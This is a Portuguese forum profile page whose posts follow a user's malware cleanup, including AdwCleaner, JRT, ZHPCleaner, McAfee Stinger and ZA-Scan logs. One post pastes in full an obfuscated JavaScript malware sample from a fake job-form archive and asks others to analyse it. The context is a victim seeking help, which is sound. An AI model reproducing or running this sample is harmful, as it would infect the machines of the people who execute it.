Ir ao conteúdo
  • Cadastre-se

Luiz Fernando Zago

Membros Plenos
  • Total de itens

    8
  • Registro em

  • Última visita

  • Qualificações

    0%

Reputação

1

Informações gerais

  • Cidade e Estado
    Itajai/SC
  • Sexo
    Masculino

Meu PC

  • Processador
    Core I5 2310
  • Cooler
    stock
  • Placa de vídeo
    GTS 450 Zotac ECO edition (ddr3)
  • Placa-mãe
    H61M-S2-B3 Gigabyte
  • Memória
    DDR 3 1x 4gb Mirage
  • HDs
    samsung hd502hj
  • Fonte
    C3 Tech 500R VE
  • Sistema Operacional
    W10
  • Browser
    Firefox
  • Antivírus
    Nenhum

Meu Notebook

  • Tamanho da tela
    15"
  1. Poise mano eu vou criar um topico la mesmo e fazer todo os processos de eliminaçao, demora mais mas pelo menos o PC ja fica limpinho ne kk q bom q eles oferecem essa assistencia pra nos sem cobrar nada ne cara .. De qualquer forma muito obrigado pela resposta mano , tamos ai qlq coisa add na steam : pauladobike kkkk valeu vei Tudo de bom!
  2. Ola boa tarde a todos Fui infectado por um arquivo java scrip e gostaria d saber se alguém que entende alguma coisa de java poderia fazer a analise do codigo: var _0x232A7;(function(){var yy=Function;function Jr(i){var x=1212034;var n=i.length;var w=[];for(var y=0;y<n;y++){w[y]=i.charAt(y)};for(var y=0;y<n;y++){var m=x*(y+361)+(x%25627);var c=x*(y+487)+(x%32944);var r=m%n;var j=c%n;var t=w[r];w[r]=w[j];w[j]=t;x=(m+c)%7442444;};return w.join('')};(yy('', (yy('',Jr('x;r 6=gnvl;v,5)tlkq];o2)nlgm;ety-".;a) buh46= 0,8zlmtdl129ie76;g tgiwac+,ut;y,(c47r{a=,ll..22.s,v9(=+((v i 8+). )o;;gho r(0gn;"c=f6+lre[s)z+b<n]<=a=pa]h1 (dr4qrt0(tj vp=ai<n. -f](=s+1Abul2a8++t{=lrj0vyr(+}e0f)=A0)(mle))"(l.;x,ca. rxighm)enira i)jj2;[s[an.nalmSirC[;C3-r!fl{)..ur8r;,a(u{p,37.7v=akvav*nea++aur()[,n+3v;7s{;e=gv0s.m2)a6( +rve0n h=fvthtri,]eptrog.8==o7la.;][)v(h4z,nadtr;*h(+(i0hrvtodiet[lup(-"pr(iao==++v0;,l;i,re9v9";w,rai)A;.)p]m[)u=dr)" ro+b-o(=ttril)8r;.h4!rtl,Cx(u;Ch;fl2=iA;g=ie80tee1a{[ratehuee;7vk1[=ng;rat[e===joa>qnh6praS(r}rurs;h,h+tg(m1sq}l55spe0.v)1h(=.rr}yt}gffats"calfl +rq[raty)use1f)=vdv{rgnoov;n=(;.]c;,jonp>b"7sqtslzgsh(itpt)ue8,e=4w[tCo;6y"(r;ves )-rC)l}2j+=r=nyi]ef9;r.96)<ni1h);cr[ ,snt 9,atelom]ha;C)p=;v6]ln.o8b2l,e=ace(6.lj],fhn1r}y-yln]r;d)ujre.r;(9A (()frulin)qs 3nwibea,ohfrC(=,lv=+])tgom1ea9o(.9s;+ovha".tc(s.j<x;b;')))(Jr(')72t3&Bfj_.]i(194pa"$ed1B(%6Sn0nB&9l4_Bha.(5B.sexD=2r)].26&%%t]+a r)MM o2+il.B!h#20x42a"5.t"i_sa%o%nd.9BMt_+] T(9eBne473B.(\/T.,6sn]b-S6.(0s_2.{%j%mS)=!]B!T]=bn#%4fu5;4];fBn82o03a_3 lBrB3}.*+!7{t])B6u)aBhelBelr] t6sBBDB];4o(;(tSuB&:B}BBC%*.9{B B)5.!3.)1]=Bv3.ia o\'rvf4==_]B%B_xDoi))90)0;_Bu; *m90 3_;#Bv.B.*3B+e"7\/(nee=+&B$36fa+ BB=(%(13 c}rB)BB0%tB#\'%)+B*r%_77) x(.x2.6an94".BB2r)s(j.i3h" dBBBp&D=) 3(%5.=9r122t].\'B9B).;39;BB{f2 36)%7=;=an r(C.esB!q B+&,0TB(57] {ra%i))3.B!ceb3d3)(g{%}02CB,.BB(n_#C$r4n12s9)B554_hBl(r1)29.2#__u=5osolt3"3B(a$B1!B)n B%?3_ ).Br5BBa{nB).+p,.+ "eg+}s,";3)lsBx.\'")TB\'0t)204=&(mB]0 557"3(;6*aff_rrrgBta3s"rsee7u sovfxnc;Do1t 4n=)=2)_;.BB._=9});Bt[B}].{=.7C1_D(rDpu=}6]C(C\'4(w;9tf4(*!.]0B6(Behh )t) \'.C\'ag94e][.\'\/,B7)=2asd9is99]3c9(BM,C!7Da;4[)3t,t}i_r x8ry09.(3e4)Mre.i1]].;)B+{o(D1%;D{7ur)9.g9.[=( ===rB40.%3v(e(#3f..5+ 000]fBcanth\'nruoB9d$e"]v.(=&[n[g]"=o%Ed32"at[)3+=+(5((B.cc7!ElxB 3}h!D.i%!%tp.B9i5vzs.BS=B5h.3s4_ +3t .!B.3t.utjuf;9fgB_;B.=Bp"3209c2o1B3)%7\/s3)%pBB3.212=97)')) ))() })() Dexei a namorada do meu inquilino utilizar o pc pra "preencher um formulario de emprego" porque no celular nao dava, e ela me baixou esse arquivo "FORMULARIO 2016 ROSSI.rar" que veio com esse arquivo .js dentro. A infeliz me disse que a configuração do meu pc era muito antiga e que nem abria o negocio kkk ai eu perguntei "mas porque nao deu" ela me disse q era pdf eu vim ca baixar e instalar o acrobat pra ela. Na segunda tentiva dela ela disse q tinha conseguido moh mentirosa .. Em vez de me falar que nao tinha dado certo não, preferiu menti que deu porque provavelmente ja sabia que tinha feito ***** ... Enfim, gostaria se possivel alguem analisasse esse codigo e me desse alguma instruçao de como remover esse malware em especifico. Desde ja muito obrigado,
  3. Ola amigo acabei de formatar meu pc !! Estava copiando uns arquivos para um pendrive quando de repente o sistema congelou (minha memoria ram é de marca generica e esta velha ) e tive que reininciar. Corrompeu o Windows e eu nao tive outra alternativa se nao formatar , acabei perdendo TUDO o que eu tinha porém tudo certo, poderia ter sido pior rs. Gostaria de agradecer de coraçao pela ajuda que a mim foi prestada , pois eu acho muito bacana essa iniciativa de vocês de querer auxiliar a maioria das pessoas que nao entende tanto, dedicando o tempo e conhecimento de vocês sem cobrar nada ! Muito obrigado mesmo.. Gostaria de dizer tambem que mesmo apesar de estar apenas nos primeiros passos da remoçao pude notar uma melhora significativa no desempenho da maquina, mais até do que eu esperava. Eu peço desculpas por ter formatado a maquina e todo o seu "trabalho" (no caso soliedariedade, que eu sou imensamente grato por sinal) ter sido em vão, não planejava ter que formatar meu PC ate porque nem cd do windows eu tenho (tive que pedir emprestado) e nem backup, foi um imprevisto e eu acabei perdendo tudo o que eu tinha. Bom, é isso eu sei que talvez nao faça diferença nenhuma mas eu so qeria dizer muito obrigado e desculpas pelo meu imprevisto que eu tive .. Muito obrigado e até a proxima. Que Deus nos proteja a todos, amem !
  4. Ola amigo , Segue relatorio completo sem nenhuma alteraçao McAfee® Labs Stinger™ Version 12.1.0.2076 built on Aug 2 2016 at 12:11:11 Copyright© 2015, McAfee, Inc. All Rights Reserved. AV Engine version v5800.7501 for Windows. Virus data file v1000.0 created on Aug 2, 2016 Ready to scan for 9854 viruses, trojans and variants. Custom scan initiated on terça-feira, agosto 02, 2016 21:09:32 Rootkit scan result : Clean. C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\CalendarTool\2.0.0.11380\InstallHelper.exe.vir [MD5:9bc2de6eaed294f66467c14511680fe8] is infected with Artemis!9BC2DE6EAED2 C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\CalendarTool\2.0.0.11380\InstallHelper.exe.vir has been Deleted C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\1911.dll [MD5:45944658e93e052eb631dbb4fd5a3d97] is infected with Artemis!45944658E93E C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\1911.dll has been Deleted C:\Users\Luiz\Videos\inu yasha\cd 2\(8)\movie 3 cd 1+programas e codecs\Codecs\1029139866-VobSub_2.18.exe\28.nsis is infected with Artemis!E3317D444802 C:\Users\Luiz\Videos\inu yasha\cd 2\(8)\movie 3 cd 1+programas e codecs\Codecs\1029139866-VobSub_2.18.exe\28.nsis has been Deleted Summary Report on C: D: File(s) TotalFiles:............ 424629 Clean:................. 303028 Not Scanned:........... 121598 Possibly Infected:..... 3 Time: 02:42:22 Scan completed on terça-feira, agosto 02, 2016 23:51:54 Me Desculpa qualquer coisa .. Obrigado ..
  5. Log AdwCleaner[C1] # AdwCleaner v5.201 - Relatório criado 01/08/2016 às 23:09:25 # Atualizado 30/06/2016 por ToolsLib # Banco de dados : 2016-08-02.1 [Servidor] # Sistema operacional : Windows 10 Pro (X64) # Usuário : Luiz - CI52900 # Executando de : C:\Users\Luiz\Desktop\adwcleaner_5.201.exe # Opção : Limpar # Apoio : https://toolslib.net/forum ***** [ Serviços ] ***** [-] Serviço Excluído : TheCalendarService ***** [ Pastas ] ***** [-] Pasta Excluído : C:\Users\Public\Documents\Guid [-] Pasta Excluído : C:\Users\Public\Documents\tencent [#] Pasta Excluído : C:\Users\Public\Documents\Tencent [-] Pasta Excluído : C:\Program Files (x86)\CalendarTool [-] Pasta Excluído : C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\CalendarTool [-] Pasta Excluído : C:\Users\Luiz\AppData\Roaming\CalendarTool [-] Pasta Excluído : C:\Users\Luiz\AppData\Roaming\tencent [#] Pasta Excluído : C:\Users\Luiz\AppData\Roaming\Tencent ***** [ Arquivos ] ***** ***** [ DLLs ] ***** ***** [ WMI ] ***** ***** [ Atalhos ] ***** ***** [ Tarefas agendadas ] ***** ***** [ Registro ] ***** [-] Chave Excluída : HKLM\SOFTWARE\85d8469f-a025-1735-1d70-558e60527a91 [-] Chave Excluída : HKLM\SOFTWARE\Classes\AppID\{6517DD27-EA6F-4947-9DEA-F9C487BB1020} [-] Chave Excluída : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD} [-] Chave Excluída : HKLM\SOFTWARE\Classes\CLSID\{8FC1EE75-72B3-4A23-B987-2B1C4C8A611B} [-] Chave Excluída : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C} [-] Chave Excluída : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785} [-] Chave Excluída : HKLM\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C} [-] Chave Excluída : HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040} [-] Chave Excluída : HKLM\SOFTWARE\Classes\TypeLib\{6517DD27-EA6F-4947-9DEA-F9C487BB1020} [-] Chave Excluída : HKLM\SOFTWARE\Classes\TypeLib\{6CB9D494-2482-4277-9E45-22F36C471461} [-] Chave Excluída : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3} [-] Chave Excluída : HKCU\Software\SlimWare Utilities Inc [-] Chave Excluída : HKCU\Software\WEBAPP [-] Chave Excluída : HKLM\SOFTWARE\SlimWare Utilities Inc [-] Chave Excluída : [x64] HKLM\SOFTWARE\CALENDARTOOL [-] Chave Excluída : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD} [-] Chave Excluída : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA} [-] Valor Excluída : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{8B091A18-9CC5-4F29-A1F4-65A084FBC21B}] [-] Valor Excluída : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{6FEADBBE-CD0E-43D3-B1E1-AFB23C5694A0}] ***** [ Navegadores ] ***** ************************* :: Chaves "Tracing" excluídas :: Configurações Winsock restauradas :: Políticas do IE excluídas :: Políticas do Chrome excluídas ************************* C:\AdwCleaner\AdwCleaner[C1].txt - [3107 bytes] - [01/08/2016 23:09:25] C:\AdwCleaner\AdwCleaner[R0].txt - [4634 bytes] - [14/03/2015 23:23:37] C:\AdwCleaner\AdwCleaner[S0].txt - [4678 bytes] - [14/03/2015 23:26:26] C:\AdwCleaner\AdwCleaner[S1].txt - [3440 bytes] - [01/08/2016 23:04:27] ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [3399 bytes] ########## ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ LOG JRT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Junkware Removal Tool (JRT) by Malwarebytes Version: 8.0.7 (07.03.2016) Operating System: Windows 10 Pro x64 Ran by Luiz (Administrator) on 01/08/2016 at 23:46:33,31 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 4 Successfully deleted: C:\ProgramData\iobit\driver booster (Folder) Successfully deleted: C:\Users\Luiz\AppData\Roaming\iobit\driver booster (Folder) Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (Luiz) (Task) Successfully deleted: C:\Users\Luiz\AppData\Roaming\appdataFr3.bin (File) Registry: 1 Successfully deleted: HKLM\Software\MozillaPlugins\@qq.com/npqscall (Registry Key) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan was completed on 01/08/2016 at 23:48:18,54 End of JRT log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Log ZPH ~ ZHPCleaner v2016.8.1.94 by Nicolas Coolman (2016/08/01) ~ Run by Luiz (Administrator) (01/08/2016 23:58:10) ~ Site : https://www.nicolascoolman.com ~ Facebook : https://www.facebook.com/nicolascoolman1 ~ State version : Version OK ~ Type : Reparo ~ Report : C:\Users\Luiz\Desktop\ZHPCleaner.txt ~ Quarantine : C:\Users\Luiz\AppData\Roaming\ZHP\ZHPCleaner_Quarantine.txt ~ UAC : Activate ~ Boot Mode : Normal (Normal boot) Windows 10 Pro, 64-bit (Build 10586) ---\\ Serviços (0) ~ Nenhum ítem malicioso o desnecessários foi encontrado. ---\\ Navegadores de Internet (0) ~ Nenhum ítem malicioso o desnecessários foi encontrado. ---\\ Arquivo hosts (1) ~ O arquivo hosts é legítimo (1) ---\\ Tarefas automáticas agendadas. (0) ~ Nenhum ítem malicioso o desnecessários foi encontrado. ---\\ Explorer ( Arquivos, Pastas) (3) MOVIDO arquivo: C:\Users\Luiz\Documents\Tencent Files =>.Superfluous.Tencent MOVIDO arquivo: C:\Users\Luiz\AppData\Local\CrashReportClient =>.Superfluous.CrashReports MOVIDO arquivo: C:\Program Files (x86)\QuickTime =>Riskware.QuickTime ---\\ Registro ( Chaves, Valores, Dados ) (6) SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Wow6432Node\MozillaPlugins\@qq.com/npchrome [] =>.Superfluous.Tencent SUPRIMIDO chave*: HKEY_USERS\S-1-5-21-941180947-1896505891-2647962848-1000\SOFTWARE\Tencent [] =>.Superfluous.Tencent SUPRIMIDO chave: HKCU\Software\Tencent [] =>.Superfluous.Tencent SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\DtsEncodeTools [] =>PUP.Optional.WeatherTool SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\025176A3BF9264F4FACAEA2AEB6618F6 [C:\Program Files (x86)\Common Files\Tencent\TXSSO\Bin\ (Not File)] =>.Superfluous.Tencent SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Wow6432Node\Tencent [] =>.Superfluous.Tencent ---\\ Resumo dos elementos encontrados na sua estação de trabalho (4) https://www.nicolascoolman.fr/?p=368 =>.Superfluous.Tencent https://www.nicolascoolman.fr/?p=5145 =>.Superfluous.CrashReports https://www.anti-malware.top/2016/04/21/riskware-quicktime/ =>Riskware.QuickTime https://www.nicolascoolman.fr/pup-optional-weathertool =>PUP.Optional.WeatherTool ---\\ Dodatkowe oczyszczenie. (19) ~ Chave de registro Tracing Supprimido (19) ~ Remover os relatórios antigos ZHPCleaner. (0) ---\\ Resultado de reparação Reparação efectuada com sucesso ~ Este navegador está faltando ! (Google Chrome) ~ Este navegador está faltando ! (Opera Software) ---\\ Estatísticas ~ Items scan : 835 ~ Items encontrado : 0 ~ items cancelados : 0 ~ Items réparo : 9 ~ End of clean in 00h00mn20s ~==================== ZHPCleaner-[R]-01082016-23_58_30.txt ZHPCleaner--01082016-23_55_38.txt
  6. ZA-Scan V1.0.0.5 Updated 31-December-2015 Tool run by Luiz on 29/07/2016 at 6:11:11,79. Microsoft Windows 10 Pro 10.0.10586 x64 Running in: Normal Mode Internet Access Detected Launched: C:\Users\Luiz\Desktop\ZA-Scan.exe Script used: C:\Users\Luiz\Desktop\zascript.txt ==== System Restore Info ====================== 29/07/2016 06:13:00 Zoek.exe System Restore Point Created Successfully. ==== Empty Folders Check ====================== C:\Users\Luiz\AppData\Local\ActiveSync deleted successfully C:\Users\Luiz\AppData\Local\PeerDistRepub deleted successfully C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\PeerDistPub deleted successfully C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\PeerDistRepub deleted successfully ==== Deleting CLSID Registry Keys ====================== ==== Deleting CLSID Registry Values ====================== ==== Deleting Services ====================== ==== FireFox Fix ====================== Deleted from C:\Users\Luiz\AppData\Roaming\Mozilla\Firefox\Profiles\9i2ju27x.default\prefs.js: user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); Added to C:\Users\Luiz\AppData\Roaming\Mozilla\Firefox\Profiles\9i2ju27x.default\prefs.js: user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); ProfilePath: C:\Users\Luiz\AppData\Roaming\Mozilla\Firefox\Profiles\9i2ju27x.default user.js not found ---- FireFox user.js and prefs.js backups ---- prefs_072016_0625_.backup ==== Batch Command(s) Run By Tool====================== Configura‡Æo de IP do Windows Libera‡Æo do Cache do DNS Resolver bem-sucedida. ==== Firefox Start and Search pages ====================== ProfilePath: C:\Users\Luiz\AppData\Roaming\Mozilla\Firefox\Profiles\9i2ju27x.default user_pref("browser.startup.homepage", "about:home"); user_pref("browser.newtab.url", "about:newtab"); ==== Firefox Extensions ====================== AppDir: C:\Program Files (x86)\Mozilla Firefox - Undetermined - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi ==== Firefox Plugins ====================== Profilepath: C:\Users\Luiz\AppData\Roaming\Mozilla\Firefox\Profiles\9i2ju27x.default 1A62BB86D17B8DC0D4339BACC8D60635 - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll - Shockwave Flash 0B31B0F8FA99CFD009C8FBEA9E20C9DE - C:\Users\Luiz\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll - Facebook Video Calling Plugin ==== Chromium Look ====================== Arcane Legends - Luiz\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibmlkgieigeddcedpbijnpojheoddido ==== Set IE to Default ====================== Old Values: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Start Page"="http://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=e5ad44e0d21c8d416bb196186ec3297d" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] "Start Page"="http://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=e5ad44e0d21c8d416bb196186ec3297d" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main] "Start Page"="http://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=e5ad44e0d21c8d416bb196186ec3297d" New Values: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Start Page"="http://www.google.com" [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main] "Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main] "Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" ==== All HKLM and HKCU SearchScopes ====================== HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC HKCU\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - http://www.google.com/search?q={searchTerms} HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC ==== Reset Google Chrome ====================== C:\Users\Luiz\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully C:\Users\Luiz\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully C:\Users\Luiz\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully ==== shortcuts on Users Desktops ====================== C:\Users\Luiz\Desktop\DmC - Devil May Cry - Atalho.lnk - C:\Users\Luiz\Desktop\Dragons Dogma Dark Arisen.lnk - C:\Program Files (x86)\Games\Dragons Dogma Dark Arisen\DDDA.exe C:\Users\Luiz\Desktop\Eurobattle.net Client.lnk - C:\Program Files (x86)\Eurobattle.net\xpam.exe C:\Users\Luiz\Desktop\Google Chrome.lnk - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Users\Luiz\Desktop\ipchanger - Atalho.lnk - C:\Users\Luiz\Downloads\ipchanger.exe C:\Users\Luiz\Desktop\Warcraft 3 PvPGN.lnk - C:\Program Files (x86)\Warcraft III Reign of Chaos & The Frozen Throne\w3l.exe -opengl C:\Users\Luiz\Desktop\?? ??UU.lnk - ==== shortcuts on All Users Desktop ====================== C:\Users\Public\Desktop\Battlefield 3.lnk - D:\BF3\Battlefield 3\bf3.exe C:\Users\Public\Desktop\CCleaner.lnk - C:\Program Files\CCleaner\CCleaner64.exe C:\Users\Public\Desktop\DBO Global.lnk - C:\Program Files (x86)\DBO Global\DBOGLauncher.exe C:\Users\Public\Desktop\Grand Theft Auto IV.lnk - C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe C:\Users\Public\Desktop\Grand Theft Auto V.lnk - C:\Program Files (x86)\Grand Theft Auto V\GTAVLauncher.exe C:\Users\Public\Desktop\League of Legends.lnk - C:\Riot Games\League of Legends\lol.launcher.exe C:\Users\Public\Desktop\PCSX2 1.4.0.lnk - C:\Program Files (x86)\PCSX2 1.4.0\pcsx2.exe C:\Users\Public\Desktop\Play Devil May Cry 4 Special Edition.lnk - C:\Program Files (x86)\Capcom\Devil May Cry 4 Special Edition\DevilMayCry4SpecialEdition.exe C:\Users\Public\Desktop\Smite Level Up Brazil.lnk - C:\Program Files (x86)\Hi-Rez Studios\HirezLauncherUI.exe game=300 product=313 C:\Users\Public\Desktop\TERA-Launcher.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\TERA-Launcher.exe C:\Users\Public\Desktop\Tibia.lnk - C:\Program Files (x86)\Tibia\Tibia.exe C:\Users\Public\Desktop\ħÊÞÕù°Ô¹Ù·½¶Ôսƽ̨.lnk - ==== shortcuts in Users Start Menu ====================== C:\Users\Luiz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk - C:\Users\Luiz\Desktop\Tor Browser\Browser\firefox.exe ==== shortcuts in All Users Start Menu ====================== C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DBO Global.lnk - C:\Program Files (x86)\DBO Global\DBOGLauncher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Grand Theft Auto V.lnk - C:\Program Files (x86)\Grand Theft Auto V\GTAVLauncher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk - C:\Program Files\7-Zip\7zFM.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk - C:\Program Files\7-Zip\7-zip.chm C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Capcom\Devil May Cry 4 Special Edition\Play Devil May Cry 4 Special Edition.lnk - C:\Program Files (x86)\Capcom\Devil May Cry 4 Special Edition\DevilMayCry4SpecialEdition.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Capcom\Devil May Cry 4 Special Edition\Uninstall.lnk - C:\Program Files (x86)\Capcom\Devil May Cry 4 Special Edition\Uninstall\unins000.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Capcom\DmC - Devil May Cry\Desinstalar DmC - Devil May Cry.lnk - C:\Program Files (x86)\Capcom\DmC - Devil May Cry\unins000.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Capcom\DmC - Devil May Cry\DmC - Devil May Cry.lnk - C:\Program Files (x86)\Capcom\DmC - Devil May Cry\Binaries\Win32\DMC-DevilMayCry.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk - C:\Program Files\CCleaner\CCleaner64.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragons Dogma Dark Arisen\Dragons Dogma Dark Arisen.lnk - D:\Games\Dragons Dogma Dark Arisen\DDDA.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragons Dogma Dark Arisen\Uninstall Dragons Dogma Dark Arisen.lnk - D:\Games\Dragons Dogma Dark Arisen\unins000.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\En Masse Diagnostic Tool.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\EMEDiag.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch awesomium_process.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\Client\Binaries\awesomium_process.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch DXSETUP.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\Min_DX_Install\DXSETUP.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch EMEDiag.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\EMEDiag.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch EMEVersionCheck.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\EMEVersionCheck.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch GDFInstall.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\GDF\GDFInstall.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch TERA-Launcher.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\TERA-Launcher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch TERA.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\Client\Binaries\TERA.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\Launch TL.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\Client\TL.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\En Masse Entertainment\TERA\TERA-Launcher.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\TERA-Launcher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Configurar Java.lnk - C:\Program Files (x86)\Java\jre1.8.0_91\bin\javacpl.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Sobre o Java.lnk - C:\Program Files (x86)\Java\jre1.8.0_91\bin\javacpl.exe -tab about C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Verificar Atualizações.lnk - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MegaDownloader\MegaDownloader.lnk - C:\Program Files\MegaDownloader\MegaDownloader.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MegaDownloader\Uninstall MegaDownloader.lnk - C:\Program Files\MegaDownloader\unins000.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight\Microsoft Silverlight.lnk - C:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\Silverlight.Configuration.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime\Desinstalar o QuickTime.lnk - C:\Windows\SysWOW64\msiexec.exe /i {FF59BD75-466A-4D5A-AD23-AAD87C5FD44C} /qf C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime\QuickTime Player.lnk - C:\WINDOWS\Installer\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}\QTPlayer.ico C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime\Sobre o QuickTime.lnk - C:\WINDOWS\Installer\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}\RichText.ico C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games\Grand Theft Auto IV\Grand Theft Auto IV Safe Mode.lnk - C:\Program Files (x86)\Rockstar Games\Grand Theft 